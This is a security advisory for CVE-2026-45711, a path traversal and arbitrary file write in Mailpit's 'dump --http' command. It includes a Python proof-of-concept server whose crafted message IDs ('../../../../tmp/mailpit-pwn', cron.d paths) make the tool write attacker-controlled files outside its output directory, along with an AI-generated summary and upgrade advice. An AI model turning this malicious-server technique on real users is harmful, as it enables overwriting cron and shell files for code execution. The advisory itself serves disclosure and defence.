VYPR
← All advisories
Medium severity5.9GHSA Advisory· Published May 19, 2026· Updated May 19, 2026

Mailpit: Path traversal & arbitrary file write in mailpit dump --http via attacker-controlled message IDs

CVE-2026-45711

Description

Summary

The mailpit dump --http sub-command downloads every message from a remote Mailpit instance and writes each one as .eml inside the user-supplied output directory. The message ID field is taken verbatim from the JSON response of the remote server and concatenated into the output path with path.Join, which silently normalizes .. segments. A malicious HTTP server impersonating Mailpit can therefore make mailpit dump write attacker-controlled bytes to any path the running user can write, fully outside the intended output directory.

Details

Anyone who can convince a user to run mailpit dump --http (typosquat, phishing tutorial, MITM of a plain-http:// Mailpit, or a compromised internal Mailpit they back up regularly) obtains an arbitrary file write primitive as the dumping user. Realistic post-exploitation includes overwriting init/cron files, shell startup files, CI artifact upload targets, web roots, etc. — anything the dumping user can write to, with attacker-controlled file bytes and a .eml filename suffix.

Affected code

internal/dump/dump.go:

path.Join("/safe/out/dir", "../../../../etc/cron.d/payload.eml") resolves to /etc/cron.d/payload.eml — the .. segments are normalized, not rejected. The remote server controls both m.ID (path) and the body of /api/v1/message//raw (contents). There is no filepath.Rel(outDir, out) containment check, no allow-list on m.ID characters, and no body-size cap.

The underlying cause is that the command was added to back up a trusted Mailpit, but the trust model on the wire never gets validated — the operator only supplies a URL.

PoC

  1. Run a malicious "Mailpit" server that returns one message whose ID contains .. segments:
# evil-mailpit.py
import http.server, json

class Evil(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        if "/api/v1/messages" in self.path:
            resp = {
                "total": 1, "unread": 0, "count": 1,
                "messages_count": 1, "messages_unread": 0,
                "start": 0, "tags": [],
                "messages": [{
                    "ID": "../../../../tmp/mailpit-pwn",          # ← traversal
                    "MessageID": "x", "Read": False,
                    "From": {"Name": "", "Address": "a@b"},
                    "To":   [{"Name": "", "Address": "c@d"}],
                    "Cc": None, "Bcc": None, "ReplyTo": [],
                    "Subject": "evil",
                    "Created": "2026-01-01T00:00:00Z",
                    "Tags": [], "Size": 5,
                    "Attachments": 0, "Snippet": ""
                }]
            }
            body = json.dumps(resp).encode()
            ctype = "application/json"
        elif "/raw" in self.path:
            body  = b"PWNED BY MAILPIT DUMP TRAVERSAL\n"
            ctype = "text/plain"
        else:
            self.send_response(404); self.end_headers(); return

        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

http.server.HTTPServer(("127.0.0.1", 19090), Evil).serve_forever()

$ python3 evil-mailpit.py &
$ mkdir -p /tmp/dump-out
$ mailpit dump --http http://127.0.0.1:19090/ /tmp/dump-out
  1. Observe the file was written outside the requested output directory:
$ ls -la /tmp/dump-out/ /tmp/mailpit-pwn.eml
/tmp/dump-out/                                        ← empty
total 0
-rw-r--r-- 1 user user 31 May 11 16:16 /tmp/mailpit-pwn.eml
$ cat /tmp/mailpit-pwn.eml
PWNED BY MAILPIT DUMP TRAVERSAL

The same primitive trivially targets ~/.config/autostart/*.eml, ~/.bash_logout.eml (where it overwrites if symlinked), CI artifact dirs that ingest every file, or via long ../ chains any absolute path the user can write to.

Impact

Arbitrary file write via path traversal in mailpit dump --http, allowing a malicious Mailpit-compatible server to force writes outside the intended output directory. This can lead to overwriting sensitive files (e.g. cron jobs, CI artifacts, shell configs) and potential code execution depending on write location and privileges.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Mailpit's `dump --http` sub-command allows arbitrary file write via path traversal in message IDs from a malicious server.

Vulnerability

The mailpit dump --http sub-command in Mailpit prior to v1.30.0 downloads messages from a remote Mailpit instance and writes each one as .eml inside the user-supplied output directory. The message ID (m.ID) is taken verbatim from the JSON response of the remote server and concatenated into the output path using path.Join, which silently normalizes .. segments. This allows a malicious HTTP server to inject path traversal sequences (e.g., ../../../../etc/cron.d/payload.eml) into the message ID, causing the file to be written outside the intended output directory. The affected code is in internal/dump/dump.go [1][2].

Exploitation

An attacker can exploit this by convincing a user to run mailpit dump --http through typosquatting, a phishing tutorial, a man-in-the-middle attack on a plain HTTP Mailpit instance, or by compromising an internal Mailpit that the user regularly backs up. No authentication is required beyond the user executing the command. The attacker sets up a malicious server that returns a crafted message ID containing .. sequences and arbitrary file content via the /api/v1/message//raw endpoint. When the user runs the dump command, the file is written to the attacker-chosen path with the attacker-controlled content and a .eml suffix [1][2].

Impact

Successful exploitation gives the attacker an arbitrary file write primitive at the privilege level of the user running the dump command. This can be used to overwrite init scripts, cron jobs, shell startup files, CI artifact upload targets, web roots, or any other writable file. The .eml suffix may limit some attack scenarios but does not prevent overwriting files that accept any extension (e.g., cron jobs, shell scripts) [1][2].

Mitigation

The vulnerability is fixed in Mailpit v1.30.0, released on 2026-05-19 [4]. Users should upgrade immediately. As a workaround, avoid using mailpit dump --http with untrusted or unverified URLs, and ensure that any Mailpit instance used for backup is trusted and accessed over HTTPS [1][2].

References
  1. CVE-2026-45711 - GitHub Advisory Database
  2. Path traversal & arbitrary file write in mailpit dump --http via attacker-controlled message IDs
  3. Release v1.30.0 · axllent/mailpit

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Axllent/MailpitGHSA2 versions
    < 1.30.0+ 1 more
    • (no CPE)range: < 1.30.0
    • (no CPE)

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

3

News mentions

0

No linked articles in our index yet.